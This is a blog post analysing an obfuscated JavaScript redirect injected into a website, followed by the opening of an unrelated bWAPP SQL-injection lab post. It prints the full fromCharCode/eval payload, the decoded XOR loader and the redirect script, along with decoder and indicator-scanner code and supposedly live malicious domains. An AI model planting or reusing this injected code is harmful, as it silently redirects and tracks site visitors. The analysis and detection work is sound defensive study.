,74-6,108-1,117-4,76-4,79-8,93-4,83-2,88-4,91-4,120-4,79-3,90-3,89-1,116-8,51
-2,103-2,83-1,115-4,99-9,80-9,74-6,85-8,119-6,74-3,82-1,54-5,60-7,102-5,76-4,110-3,103-6,76-5,84-2,50-2,112-3,80-6,122-2,53-1,108-9,102-2,126-4,125-6,56-5,78-6,85-2,79-2,89-5,73-6,76-9,53-4,76-8,95-8,59-9,85-3,60-9,106-6,87-1,108-1,116-8,84-6,69-1,82-1,56-9,68-1,110-7,116-1,125-9,111-9,81-9,117-9,87-4,94-4,115-7,120-8,65-9,90-9,87-2,123-7,92-2,104-3,93-5,94-8,55-2,91-4,88-4,72-7,76-1,87-9,93-6,122-7,79-6,78-4,115-9,121-2,58-3,89-9,87-1,112-4,60-5,90-7,123-2,89-8,90-5,76-4,86-4,104-1,57-8,75-2,72-4,125-5,92-4,79-3,125-6,93-8,113-7,84-8,110-6,83-6,57-7,85-5,57-6,55-6,58-3,83-2,113-4,84-2,73-1,91-1,130-9,106-3,50-2,71-4,110-5,54-6,49-1,80-5,122-3,51-2,120-2,86-1,71-2,52-3,118-4,86-3,52-3,114-6,57-4,109-9,95-7,110-3,86-5,81-8,74-5,117-1,124-6,78-3,72-4,86-5,100-1,82-4,123-1,78-8,59-6,83-1,73-1,120-4,79-3,104-7,114-4,120-8,68-1,96-9,85-2,81-7,108-6,102-1,87-1,115-7,114-5,90-7,51-1,101-1,117-3,84-1,55-6,113-6,56-2,71-4,115-9,126-7,91-3,76-3,113-6,119-3,56-2,102-5,120-1,109-6,114-5,84-8,127-5,84-3,58-9,71-3,73-6,79-1,73-3,78-3,129-8,56-4,77-7,81-9,110-5,56-8,66-9,91-2,115-5,84-6,113-4,91-8,51-1,104-4,120-6,85-2,51-2,109-2,112-5,97-9,53-2,115-7,96-6,95-5,114-7,123-7,116-6,103-6,124-5,106-3,115-6,78-2,124-2,82-1,55-6,72-4,74-7,79-1,84-8,105-4,113-4,121-6,103-2,77-7,127-5,121-2,117-8,85-6,108-4,105-2,52-2,76-8,117-8,60-4,117-6,80-2,67-2,57-1,55-3,86-7,87-4,124-5,108-9,100-3,68-2,109-6,125-4,80-5,91-9,110-7,83-5,84-9,128-6,125-6,57-6,79-7,116-7,53-1,75-2,72-1,76-8,110-7,111-9,72-1,74-7,119-4,107-3,101-1,94-8,116-9,109-1,85-7,76-9,74-1,113-5,70-2,54-5,75-9,127-8,101-3,110-2,80-2,98-8,91-1,110-3,118-2,116-6,80-2,110-1,75-5,93-3,109-8,93-5,91-5,59-6,73-6,129-8,80-3,106-4,80-3,114-8,114-7,74-4,88-1,86-2,120-9,81-6,77-1,129-9,110-7,121-8,76-4,110-5,81-7,126-7,95-6,87-1,113-5,60-7,76-1,75-5,86-8,131-9,93-3,112-5,120-5,112-8,82-2,111-8,88-3,104-7,79-3,93-9,127-8,56-6,72-2,57-7,98-9,90-1,80-7,109-3,60-4,118-7,71-1,110-4,98-9,45-2,84-7,73-7,121-1,119-2,70-3,68-2,107-4,112-4,72-5,112-8,
88-7,57-1,103-2,96-8,112-5,85-5,75-1,122-3,107-8,124-3,84-8,113-6,104-4,92-2,84-4,69-2,49-1,66-9,79-8,70-2,63-7,94-5,102-4,117-8,123-8,86-5,108-9,53-2,113-5,50-1,106-5,95-9,109-2,125-6,71-4,113-7,90-4,116-2,71-3,108-5,72-3,65-8,86-8,72-5,53-5,102-3,92-2,117-9,93-3,116-6,82-8,86-5,56-4,83-4,110-9,90-8,76-7,57-5,72-4,88-5,84-6,76-8,99-1,112-2,75-9,110-6,96-9,95-7,109-1,50-1,107-6,91-9,126-7,47-4,74-6,126-5,94-5,51-4,76-8,117-9,105-6,119-6,86-9,74-7,53-5,66-9,79-5,122-2,65-9,112-7,92-3,122-3,53-1,68-2,81-1,92-8,82-1,120-4,77-5,74-3,111-8,78-1,81-8,108-2,64-8,125-7,75-4,73-6,55-7,126-7,107-8,91-5,74-8,112-3,85-4,74-3,106-7,121-4,76-7,123-3,49-1,55-3,78-2,69-2,113-1,89-8,109-7,89-2,77-7,117-7,106-9,49-1,117-1,92-2,80-4,130-8,88-7,118-4,96-9,89-6,92-7,49-1,79-2,86-3,114-3,77-5,75-7,75-7,123-3,53-4,96-6,73-3,114-7,107-1,72-1,72-5,82-1,120-7,75-4,127-7,128-8,126-6,78-5,125-3,109-6,95-9,86-9,127-8,57-4,119-2,98-1,53-5,72-6,92-2,106-7,93-5,56-8,62-6,69-4,86-3,78-5,79-4,86-6,107-1,113-9,79-3,88-6,79-8,90-8,58-9,84-6,126-7,120-1,120-7,74-8,56-6,57-4,115-1,91-5,74-4,113-5,56-1,105-5,52-1,114-6,69-1,94-4,112-5,111-3,58-2,106-9,127-8,57-5,75-9,83-8,93-9,128-9,116-2,73-1,72-4,89-3,88-1,92-2,96-9,118-2,67-2,90-3,88-4,125-6,124-8,81-1,91-9,106-3,128-7,75-7,117-8,112-5,52-5,73-7,71-4,127-8,87-9,78-8,111-8,119-8,84-6,80-2,74-9,78-5,114-2,80-4,74-5,80-2,86-5,105-6,76-5,60-7,87-3,90-3,93-6,91-1,82-6,93-3,125-4,59-3,78-9,74-3,106-1,124-5,61-9,85-5,73-7,100-1,129-8,90-8,85-2,85-4,116-9,72-6,71-5,76-3,124-5,83-6,75-3,110-2,70-1,98-8,111-8,111-8,91-2,79-5,83-2,112-1,87-2,82-2,80-8,90-4,124-3,95-8,88-1,86-4,89-2,91-1,96-9,118-2,70-5,92-5,88-4,116-5,77-2,83-7,123-3,105-2,121-8,76-4,112-7,78-4,120-1,95-6,88-2,110-2,59-6,84-9,78-8,85-7,130-8,98-8,109-2,124-9,108-4,83-3,111-8,94-9,101-4,79-3,87-3,126-7,55-5,77-7,54-4,93-4,81-8,83-7,124-3,53-1,78-5,74-5,109-5,116-5,61-7,84-6,110-6,78-5,124-6,76-8,110-1,58-1,106-1,86-3,121-2,83-9,91-7,106-6,95-7,111-3,94-4,93-3,110-7,80-7,108-4,102-5,56-8,81-4,93-7
,79-1,109-3,90-1,56-4,79-9,88-6,90-5,109-7,82-7,70-2,112-5,81-6,73-1,107-1,126-6,58-3,87-7,106-2,126-7,123-2,82-9,108-2,84-7,121-4,71-5,113-5,77-7,52-9,81-5,73-8,72-7,85-1,87-9,73-8,116-4,127-5,78-7,128-7,109-6,104-7,97-8,89-5,58-6,50-2,84-5,124-5,59-7,83-4,84-6,69-1,108-4,100-3,75-6,77-9,120-4,126-5,106-7,75-5,117-9,63-8,91-5,111-1,116-4,122-8,91-7,75-6,109-5,50-7,104-2,79-7,114-7,69-2,93-9,74-5,121-5,116-6,102-5,50-2,118-2,92-2,105-4,92-9,108-9,65-9,70-2,87-3,85-8,96-6,81-6,94-7,117-2,110-8,75-8,128-7,126-7,126-7,98-9,112-2,82-4,113-4,89-6,53-3,101-1,121-7,74-4,113-5,112-5,65-9,82-3,88-5,115-4,102-3,94-4,107-3,73-7,79-1,106-9,57-9,117-1,91-1,109-8,91-3,93-7,61-8,76-6,89-6,113-6,74-1,76-2,109-4,108-9,56-4,69-1,85-1,95-6,111-1,80-1,74-8,61-9,113-7,88-6,88-4,89-8,124-7,81-9,124-2,74-9,117-1,86-9,74-6,84-2,86-4,98-9,83-1,80-7,104-3,76-3,83-1,112-5,92-3,104-6,84-3,94-9,103-6,76-5,114-4,61-9,66-1,77-2,106-3,114-7,109-3,73-1,72-5,118-7,116-7,100-3,75-9,73-8,116-9,92-8,79-8,120-4,117-3,90-6,74-5,108-4,50-7,111-9,73-2,76-2,123-1,99-9,113-6,124-8,112-2,106-9,124-4,98-8,125-3,107-6,96-8,93-7,59-6,96-9,92-8,74-9,79-4,84-6,90-3,118-3,93-3,79-7,72-4,64-8,122-3,80-5,121-2,121-6,114-8,78-7,86-4,86-1,126-9,75-7,122-2,72-7,123-9,78-1,69-1,120-9,79-1,71-5,86-5,82-1,114-3,78-5,68-3,82-9,103-4,103-2,90-3,111-7,60-7,78-6,110-5,79-2,105-3,68-2,73-6,82-1,73-4,72-3,112-6,72-7,128-9,104-5,95-9,117-2,51-3,70-2,110-5,76-7,125-8,79-8,84-3,117-2,58-2,78-4,126-7,118-3,105-6,77-4,104-1,79-6,54-5,85-9,106-3,108-5,84-6,80-9,107-1,118-7,58-8,70-1,106-1,63-7,81-2,92-2,91-4,75-1,84-3,105-6,55-4,116-8,56-7,104-3,87-1,112-5,127-9,76-8,88-1,106-6,109-3,76-5,88-6,125-6,50-3,85-8,72-5,119-4,77-1,76-3,123-3,114-7,88-2,83-7,106-3,61-5,90-9,76-1,130-8,68-3,60-6,76-8,89-8,93-8,74-5,77-2,76-9,74-9,73-6,76-4,76-4,112-4,52-4,99-9,75-5,110-3,117-6,79-7,108-3,120-5,112-2,89-6,55-6,61-4,48-1,106-6,92-9,123-8,105-6,79-6,70-5,60-8,52-3,88-9,89-8,53-1,83-7,73-6,126-4,69-4,65-8,71-2,77-9,90-9,80-1,80-6,69-1,57-1,118-7,
71-1,110-4,97-8,48-5,86-9,72-6,126-6,111-2,86-3,117-7,119-7,117-3,87-4,88-2,125-9,120-1,101-1,91-8,77-3,131-9,96-6,109-2,121-5,111-1,101-4,55-7,118-2,95-5,76-1,127-5,74-9,117-1,71-3,70-2,86-5,73-3,92-2,128-6,60-4,94-4,69-1,76-8,125-5,118-1,92-7,53-4,114-6,110-1,85-2,58-8,108-9,53-3,90-7,125-5,121-2,57-8,78-4,111-5,127-7,92-2,82-6,126-7,57-8,117-7,90-1,126-7,61-5,88-1,83-4,111-6,66-1,51-3,79-7,74-7,106-3,105-3,104-7,89-6,109-6,78-9,78-8,113-7,79-6,64-8,85-5,79-9,103-4,126-8,70-4,92-9,84-7,125-8,70-1,127-5,98-9,50-3,107-5,97-9,53-1,88-9,82-7,84-2,116-9,109-3,85-6,127-7,115-8,104-5,80-5,111-6,97-8,75-4,77-7,84-1,115-8,86-9,75-2,76-9,61-9,88-8,89-1,114-4,69-3,51-2,107-6,75-6,91-9,62-7,87-4,51-1,120-8,56-2,92-3,93-5,71-5,54-1,101-1,97-9,115-7,99-9,97-7,109-2,117-1,116-6,79-1,126-6,104-4,97-7,83-3,87-3,117-6,55-1,70-2,68-1,118-3,86-7,79-4,93-9,62-5,74-4,80-9,113-7,96-7,58-4,85-8,107-3,72-7,111-5,91-9,92-9,53-1,117-9,76-8,122-2,120-1,111-7,79-8,112-6,58-1,86-4,96-7,86-4,124-5,54-3,99-9,113-9,105-2,107-8,80-4,87-4,71-2,123-4,72-2,125-4,73-4,93-4,96-7,73-2,83-9,82-6,90-3,80-9,83-1,117-6,109-8,95-9,88-6,60-9,94-5,93-6,103-3,120-6,84-1,51-2,116-8,62-9,101-1,91-3,115-7,93-3,91-1,113-6,124-8,111-1,101-4,57-9,124-8,97-7,104-3,92-9,108-1,114-6,88-1,86-3,82-9,73-4,77-3,73-5,56-4,72-1,78-6,69-1,108-9,105-1,106-6,121-1,112-1,113-1,71-5,68-1,124-5,111-6,74-6,115-7,100-1,124-5,84-5,128-6,51-3,106-7,89-9,107-2,86-5,107-3,96-7,56-8,125-6,87-8,85-7,109-4,100-1,59-2,73-6,92-8,86-5,88-9,87-9,69-1,105-2,56-8,77-9,89-5,128-9,116-7,80-4,89-3,60-7,123-5,92-9,55-5,97-7,56-6,93-7,114-6,114-6,53-5,95-5,78-6,75-9,94-4,95-5,111-7,69-3,86-8,105-8,54-6,119-3,91-1,106-5,90-2,87-1,61-8,76-9,122-1,81-4,103-1,85-8,110-4,112-5,72-2,93-6,84-1,53-5,118-8,81-5,71-5,129-9,61-4,98-9,94-7,101-1,117-3,88-5,51-2,111-4,109-2,101-1,88-4,120-1,94-8,80-2,85-4,55-2,113-3,85-8,77-6,76-6,96-6,106-5,89-1,93-7,60-7,88-1,88-1,94-5,92-3,77-4,115-9,60-4,118-7,76-6,111-5,90-1,50-7,86-9,75-9,128-8,118-1,85-2,88-4,91-6,125-8,72-
4,89-7,127-8,122-8,83-9,130-8,121-2,81-5,73-3,73-8,53-1,111-5,81-8,106-2,112-5,100-1,81-2,107-2,76-7,104-7,77-7,110-5,109-2,71-6,77-1,112-7,57-4,82-8,89-3,89-1,111-3,57-6,84-4,91-9,94-4,111-2,72-6,85-2,107-4,48-1,88-5,127-8,117-2,57-1,84-7,85-1,68-3,79-3,75-2,122-3,110-7,125-3,105-8,89-4,102-2,92-2,101-3,113-4,99-9,117-5,91-6,79-7,56-7,107-3,91-1,55-5,124-8,79-3,92-5,89-1,111-3,52-3,79-4,124-4,128-9,127-6,73-1,108-2,89-4,115-7,86-3,126-6,64-8,58-6,80-1,89-6,117-6,106-7,104-2,90-3,73-3,111-1,101-4,56-8,125-9,91-1,78-4,75-5,59-2,56-3,92-5,89-5,125-9,108-4,92-8,91-7,91-1,107-3,108-9,50-1,85-7,104-2,85-9,122-2,106-3,53-5,89-6,123-1,90-5,123-6,75-8,110-6,53-5,107-4,69-3,107-2,57-9,94-5,84-7,110-7,58-6,78-9,80-7,126-7,53-1,99-2,85-8,106-2,128-9,56-5,77-9,88-5,79-2,91-1,80-3,88-5,117-6,79-7,94-7,91-4,85-3,56-7,80-5,111-7,121-2,127-6,78-5,110-5,112-5,50-3,69-1,111-8,118-3,121-3,86-8,76-8,94-8,91-9,81-8,68-2,53-1,119-7,79-4,70-4,57-1,85-4,84-6,110-4,124-8,124-4,92-7,78-7,97-8,84-3,92-8,95-8,119-3,77-1,72-3,69-1,62-5,58-9,108-9,87-5,57-9,116-4,76-9,76-8,75-2,113-4,69-1,105-1,101-2,121-5,102-1,127-6,119-4,100-1,75-1,126-7,64-8,51-8,79-8,67-1,58-2,92-3,81-5,87-3,70-4,55-2,83-1,76-4,124-8,90-3,95-5,56-6,127-8,74-1,76-6,110-4,89-8,112-4,81-3,90-8,124-5,128-7,69-1,110-1,72-6,72-6,90-7,50-1,114-6,59-6,104-4,89-1,111-3,98-8,88-9,107-3,106-6,112-2,77-1,120-1,87-6,105-8,81-5,75-7,104-1,57-1,77-7,126-4,83-9,71-1,86-8,89-6,55-3,82-7,75-3,86-3,70-5,79-8,79-3,89-7,104-1,125-4,77-9,117-8,103-3,56-6,94-8,111-3,115-7,48-5,82-2,72-4,106-7,81-3,80-7,125-5,109-2,111-2,76-1,74-8,63-7,89-8,81-5,123-1,74-8,48-5,86-1,76-5,98-9,84-3,88-4,96-9,118-2,78-2,89-2,96-8,113-6,57-7,84-6,85-3,123-4,111-1,79-8,90-9,55-3,113-5,73-1,124-4,125-6,122-8,77-4,128-6,106-3,87-1,104-6,113-9,110-3,113-8,78-3,109-6,59-3,68-3,76-9,110-5,75-6,59-7,75-7,91-8,81-4,115-4,77-1,123-2,55-3,81-8,78-9,111-7,73-8,63-8,85-9,83-1,125-6,50-2,80-8,86-3,91-2,119-9,88-7,108-1,78-4,89-5,104-4,96-8,115-7,97-7,95-5,113-9,105-2,124-2,77-2,1
05-1,113-6,86-8,104-5,95-7,124-4,109-4,100-1,56-6,95-5,83-7,85-6,113-6,72-3,91-4,94-8,90-2,116-8,108-1,106-9,89-3,68-2,61-4,90-1,94-7,106-2,111-4,92-6,57-8,93-4,121-8,79-1,114-9,121-6,85-4,86-8,109-5,63-6,54-1,84-3,95-8,71-2,64-3,41-2,60-1,15-5,106-4,124-7,111-1,102-3,120-4,106-1,112-1,113-3,38-6,125-5,120-9,123-9,100-5,107-6,111-1,101-2,47-7,121-6,118-2,121-7,113-8,115-5,108-5,52-8,35-3,109-2,102-1,125-4,46-5,37-5,124-1,12-2,38-6,33-1,123-5,101-4,117-3,36-4,122-8,106-5,117-2,41-9,70-9,36-4,46-7,40-1,61-2,16-6,41-9,33-1,108-6,120-9,123-9,41-9,41-1,124-6,100-3,120-6,33-1,112-7,33-1,67-6,37-5,49-1,66-7,35-3,107-2,36-4,66-6,37-5,122-7,117-1,117-3,113-8,115-5,105-2,52-6,109-1,105-4,113-3,107-4,117-1,112-8,68-9,34-2,109-4,48-5,46-3,50-9,38-6,129-6,17-7,34-2,39-7,33-1,36-4,121-7,104-3,123-8,33-1,45-2,63-2,40-8,90-7,124-8,123-9,107-2,114-4,111-8,49-3,106-4,119-5,114-3,115-6,75-8,110-6,100-3,115-1,71-4,112-1,104-4,103-2,47-7,117-2,122-6,119-5,108-3,113-3,105-2,51-5,101-2,106-2,103-6,120-6,69-2,120-9,108-8,109-8,72-7,123-7,44-4,111-6,43-2,38-6,103-9,13-3,34-2,37-5,33-1,37-5,37-5,37-5,38-6,33-1,34-2,41-9,41-9,35-3,37-5,41-9,41-9,41-9,39-7,40-8,36-4,41-9,40-8,36-4,39-7,41-9,40-8,34-2,37-5,36-4,33-1,37-5,40-8,39-7,113-6,109-8,126-5,52-6,100-1,106-2,106-9,118-4,73-6,112-1,103-3,103-2,72-7,120-4,46-6,108-3,38-6,45-8,37-5,112-5,110-9,130-9,50-4,113-5,110-9,113-3,107-4,119-3,109-5,49-8,48-7,63-4,14-4,33-1,41-9,130-5,11-1,37-5,37-5,119-5,107-6,123-7,122-5,116-2,114-4,35-3,123-9,108-7,117-2,68-9,11-1,127-2,18-8,19-9,127-9,104-7,119-5,35-3,101-1,108-7,105-6,41-9,70-9,34-2,121-1,114-3,118-4,97-2,104-3,117-7,100-1,45-5,98-1,120-4,120-9,101-3,46-6,104-3,119-9,101-2,102-1,106-6,50-9,50-6,35-3,113-6,104-3,122-1,45-4,65-6,14-4,43-3,119-9,103-2,125-6,37-5,77-7,123-6,119-9,104-5,125-9,106-1,117-6,115-5,43-3,108-8,107-6,102-3,43-2,48-7,41-1,45-4,60-1,17-7,11-1);eval(DRYUQIEDHS);

I was excited looking at this. At this point I knew that something malicious was going on. A reputable site should not be obfuscating anything. Things such as directories or Google Analytics code are normally not hidden. My suspicion and interest were definitely raised. You can pick your poison with how to decode the above.

Lifting the veil

The above code uses the fromCharCode() method of the String object to build a string from the numeric character codes passed to it, here each written as a small subtraction so that the plain values never appear in the source. For example, “ABC” is represented by String.fromCharCode(65,66,67). This technique is also often seen in Cross-Site Scripting vectors when alert() or void() cannot be used directly. Further decoding led to the following.

var key = 'kGKkyYUYyF';
var enced = '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';
function xor_enc(string, key) {
  var res = '';
  for (var i = 0; i < string.length; i++) {
    res += String.fromCharCode(string.charCodeAt(i) ^
                                key.charCodeAt(i % key.length));
  }
  return res;
}

var dec = xor_enc(atob(enced), key);
(new Function(dec))();

When I saw this, I knew this was the last bit of de-obfuscation I had to do. When I looked at the for loop, the “^” character caught my attention. In Javascript, the caret is used for XOR, or Exclusive OR. This is a very interesting cipher. After brushing up on some XOR logic, I was able to decode the above even further since I was given the key.
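Both layers just described can be undone without ever running the payload. The following Python is an added example of mine, not code from the post or from the malware: it evaluates the "a-b" arguments of String.fromCharCode() with plain arithmetic (rejecting anything that is not a number expression), and then reproduces the atob() + xor_enc() stage with base64 and a repeating-key XOR. The sample strings it decodes are constructed here; the key kGKkyYUYyF is the one shown in the decoded script above.

```python
"""Eval-free decoder for the two obfuscation layers discussed above.

Added example, not code from the post or from the malware.
Layer 1: String.fromCharCode(13-3,125-7,...)  every argument is an "a-b" expression
Layer 2: xor_enc(atob(enced), key)            base64, then repeating-key XOR
Only arithmetic and string operations are used, so the payload is read, never run.
"""
import base64
import re

# One argument: a number optionally followed by +/- terms, e.g. "130-9" or "10+3-1".
_TOKEN_RE = re.compile(r"^\d+(?:[-+]\d+)*$")
_TERM_RE = re.compile(r"([-+])(\d+)")
# A whole call site; the argument list may only hold digits, commas, '+', '-', whitespace.
_CALL_RE = re.compile(r"String\.fromCharCode\(\s*([\d,\s+\-]+)\)")


def eval_charcode_token(tok: str) -> int:
    """Evaluate one "a-b" style term left to right, rejecting anything else."""
    tok = tok.strip()
    if not _TOKEN_RE.match(tok):
        raise ValueError(f"unexpected token in argument list: {tok!r}")
    total = int(re.match(r"\d+", tok).group(0))
    for sign, num in _TERM_RE.findall(tok):
        total = total - int(num) if sign == "-" else total + int(num)
    return total


def decode_charcode_args(arg_list: str) -> str:
    """Turn "120-2,100-3,119-5" into the string fromCharCode would have built."""
    return "".join(chr(eval_charcode_token(t)) for t in arg_list.split(","))


def extract_fromcharcode_strings(source: str) -> list:
    """Decode every String.fromCharCode(...) argument list found in a script."""
    return [decode_charcode_args(m.group(1)) for m in _CALL_RE.finditer(source)]


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as the page's xor_enc()."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_xor_stage(enced: str, key: str) -> str:
    """atob() followed by xor_enc(): base64-decode, then XOR with the key."""
    raw = base64.b64decode(enced)  # atob() yields these same bytes as a binary string
    return xor_with_key(raw, key.encode("latin-1")).decode("latin-1")


def encode_xor_stage(plain: str, key: str) -> str:
    """The inverse, used only to build a sample; XOR is symmetric, so one routine serves both."""
    cipher = xor_with_key(plain.encode("latin-1"), key.encode("latin-1"))
    return base64.b64encode(cipher).decode("ascii")


if __name__ == "__main__":
    # Constructed sample in the shape of the first layer (decodes to "var key").
    stage1 = "var Q = String.fromCharCode(120-2,100-3,119-5,40-8,110-3,105-4,130-9);eval(Q);"
    print(extract_fromcharcode_strings(stage1))
    # Constructed sample for the second layer, using the key shown in the decoded script.
    key = "kGKkyYUYyF"
    enced = encode_xor_stage("console.log('decoded stage');", key)
    print(decode_xor_stage(enced, key))
```

Because the decoder only accepts digit/sign tokens, a sample that smuggles a function call into the argument list is rejected with a ValueError instead of being evaluated, which is the property you want in a tool that is pointed at unknown scripts.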

//<script>
var w_location =
      '/?pagerd_' + Math.random().toString(36).substring(7);

function start() {

  var from = document.referrer;
  var i;

  if (checkCookie()) {
    return;
  }
  var uagent = navigator.userAgent;
  if (!uagent || uagent.length == 0) {
    return;
  }
  uagent = uagent.toLowerCase();
  if (uagent.indexOf('google') != -1 || uagent.indexOf('bot') != -1
      || uagent.indexOf('crawl') != -1) {

  } else {
    if (window.history && window.history.length > 2) {
      window.location = w_location;
    }
  }

  function getCookie(c_name) {
    var c_value = document.cookie;
    var c_start = c_value.indexOf(" " + c_name + "=");
    if (c_start == -1) {
      c_start = c_value.indexOf(c_name + "=");
    }
    if (c_start == -1) {
      c_value = null;
    }
    else {
      c_start = c_value.indexOf("=", c_start) + 1;
      var c_end = c_value.indexOf(";", c_start);
      if (c_end == -1) {
        c_end = c_value.length;
      }
      c_value = unescape(c_value.substring(c_start, c_end));
    }
    return c_value;
  }

  function setCookie(c_name, value, exdays) {
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + exdays);
    var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
    document.cookie = c_name + "=" + c_value;
  }

  function checkCookie() {
    if (localStorage.getItem('yYjra4PCc8kmBHess1ib') === '1') {
      return true;
    } else {
      localStorage.setItem('yYjra4PCc8kmBHess1ib', '1');
    }
    var referrerRedirectCookie = getCookie("referrerRedirectCookie");
    if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
      return true;
    } else if (document.cookie.indexOf('wordpress_logged') !== -1
               || document.cookie.indexOf('wp-settings') !== -1
               || document.cookie.indexOf('wordpress_test') !== -1)  {
      return true;
    } else {
      setCookie("referrerRedirectCookie", "do not redirect", 730);
      return false;
    }
  }

}



var readyStateCheckInterval = setInterval(function() {
  if (document.readyState === 'complete'
      || document.readyState == 'interactive') {
    clearInterval(readyStateCheckInterval);
    start();
  }
}, 10);
//</script>

This is where the fun begins. With the raw HTML code, I would be able to trace back the origin of this malware. That being said, let's take it from the top and analyze the code. The first thing that stood out to me was the '/?pagerd_' + Math.random().toString(36).substring(7); variable declaration. If the right conditions are met (more on this in a bit), the page redirects to a path carrying a random suffix, such as:

  • /?pagerd_lmdpmp
  • /?pagerd_xqb1fk5
  • /?pagerd_zj91e5

and so on. Let’s look at the conditions that will not trigger a redirect.

  • If your User-Agent contains “google”, “bot”, or “crawl” (the script leaves crawlers alone).
  • If you have the key “yYjra4PCc8kmBHess1ib” in your browser’s localStorage (in case you have gotten infected in the past).
  • If any of the cookies wordpress_logged, wp-settings or wordpress_test has been set.
  • If the cookie “referrerRedirectCookie” exists.
  • If window.history.length is not greater than 2; the redirect only fires from a tab with more than two history entries.
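Those gates, together with the obfuscation artefacts seen earlier, are concrete things a page review can grep for. The following Python is an added example, not part of the post: it scans a page's inline scripts for those indicators and flags a script block when several co-occur, so an analyst can find the injected footer before spending time de-obfuscating it. The benign and infected sample pages are constructed here; the analytics stub and its 'UA-XXXXXXX-1' id are placeholders.

```python
"""Static indicator scan for the redirect script family analysed above.

Added example, not part of the post. It greps a page's inline scripts for the
artefacts the post describes and flags a script block when several co-occur.
Sample pages below are constructed; the analytics stub and its id are placeholders.
"""
import re

INDICATORS = {
    "fromcharcode_arithmetic": re.compile(r"String\.fromCharCode\(\s*\d+\s*[-+]\s*\d+"),
    "eval_or_function_ctor": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "atob_xor_stage": re.compile(r"\batob\s*\(|\^\s*\w+\.charCodeAt\("),
    "pagerd_redirect": re.compile(r"/\?pagerd_"),
    "crawler_ua_gate": re.compile(r"indexOf\(\s*['\"](?:google|bot|crawl)['\"]\s*\)"),
    "wordpress_cookie_gate": re.compile(r"wordpress_logged|wp-settings|wordpress_test"),
}
_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def scan_text(text: str) -> dict:
    """Return the sorted indicator names that match, plus a verdict."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    # A lone hit (a legitimate atob() call, say) is noise; two or more together earn a look.
    return {"hits": hits, "suspicious": len(hits) >= 2}


def find_suspicious_scripts(html: str) -> list:
    """Scan each inline <script> body separately so the reviewer knows where to look."""
    flagged = []
    for idx, m in enumerate(_SCRIPT_RE.finditer(html)):
        verdict = scan_text(m.group(1))
        if verdict["suspicious"]:
            flagged.append((idx, verdict["hits"]))
    return flagged


# Constructed benign page: an analytics stub with a placeholder tracking id.
BENIGN_PAGE = """<html><body><p>hello</p>
<script>
  window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments); };
  ga('create', 'UA-XXXXXXX-1', 'auto'); ga('send', 'pageview');
</script>
</body></html>"""

# Constructed infected page: the same page with a footer script in the shape dissected above.
INFECTED_PAGE = BENIGN_PAGE + """
<script>
var PRZKZPVRCI = String.fromCharCode(120-2,100-3,119-5,40-8,110-3,105-4,130-9);eval(PRZKZPVRCI);
var w_location = '/?pagerd_' + Math.random().toString(36).substring(7);
if (uagent.indexOf('google') != -1 || uagent.indexOf('bot') != -1) { }
</script>"""


if __name__ == "__main__":
    print(scan_text(BENIGN_PAGE))
    print(find_suspicious_scripts(INFECTED_PAGE))
```

The threshold of two co-occurring indicators is a deliberate trade-off: a single atob() or eval() shows up in plenty of legitimate code, while arithmetic fromCharCode arguments next to a crawler gate or a pagerd_ path almost never do.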

When I first visited the site on a virtual machine, I closely observed the requests that were being exchanged, and I noticed a pattern on two accounts with different browsers. A brief redirect appeared in the URL bar of my browser. Because I saw the correlation in different browser types, I decided to run Live HTTP Headers to catch the request. To no surprise, I found the redirected site.

Please proceed to the following links at your own risk, as the links could still be active upon the publication of this article. I decided to take the bait and go to http://gakno.com.mx/css. This domain could be a relay for this attack, as I was finally redirected to http://lovewe.com. The Gakno domain appeared to be a normal site. Either the attacker did a good job at masking a relay or the web admin for the infected domain really is clueless about what is going on.

Upon landing on LoveWe.com, it seems to be a dating site. If you closely examine the source code, you will notice that your location is being tracked for certain date matches (can we expect any less from a dating site?). It is not out of the ordinary for sites to track user location for demographic purposes, so this part did not pique my interest.

function GetParam(name) {
  var match = new RegExp(name + "=*([^&]+)*", "i").exec(location.search);
  if (match == null)
    match = new RegExp(name + "=(.+)", "i").exec(location.search);
  if (match == null) return null;
  match = match + "";  // convert match to a string
  result = match.split(",");
  return decodeURIComponent(result[1]);
}

function logStatus(type) {
  $.ajax({
    cache: false,
    global: false,
    async: true,
    type: "POST",
    url: '/logpstatus.php',
    data: {uid: GetParam('uid'), type: type}
  });
}

What did have me concerned was some hidden frames on the site.

  <frameset cols="1,*,1" border=0>
        <frame name="top" src="tg.php?uid=lovewe5904193acc90f4.52881511" scrolling=no frameborder=0 noresize framespacing=0 marginwidth=0 marginheight=0>
        <frame src="search_caf.php?uid=lovewe5904193acc90f4.52881511&src=mountains&abp=1" scrolling="auto" framespacing=0 marginwidth=0 marginheight=0 noresize>
        <frame src="page.php?lovewe5904193acc90f4.52881511"></frame>
    </frameset>
    <noframes>

One of the frames that caught my attention was the page.php frame. Looking at the source, it writes img.php as an image; however, the .PHP extension is suspicious since it is not an image type. I am not entirely sure what this file does, since I cannot break it down any further and PHP code can only be seen by having access to the actual file. Inspecting the other PHP files, you will see some basic info gathering.

Conclusion

Overall, it looks like these attacks are related to improving SEO ranks and site promotion. Throughout all my digging, I located the attacker as residing in Mount Laurel, NJ. We will never know what purpose your information will serve for malicious users, but this expedition has assured me that not even marketing giants are safe from malware and infection.

For those who are curious, the site that was initially infected never sent out any message to its customers about the infection and the potential breach. This goes to show how far people will go to cover up their own unethical conduct. Money != security; on the contrary, the bigger and more robust your systems are, the higher the risk that a flaw exists somewhere. Security through obscurity, anyone?

Stay educated and informed, my friends, until next time – Happy Hacking!

bWAPP SQL Injection (SQLite)

Introduction

Hi again. Today I have decided to document yet another unpublished challenge presented in bWAPP. This challenge concerns SQL Injection while the server uses the SQLite engine.

I will try to make this post relatively short, explaining the following:

  • Getting To Know Our Target
  • Finding Database Information (tables/columns/sqlite version)
  • Extracting Database Information
  • Last Words

Getting To Know Our Target

In this section I want to spend some time on finding the SQL Injection vulnerability that exists and on some preparation that has to be done to get to a working injection.

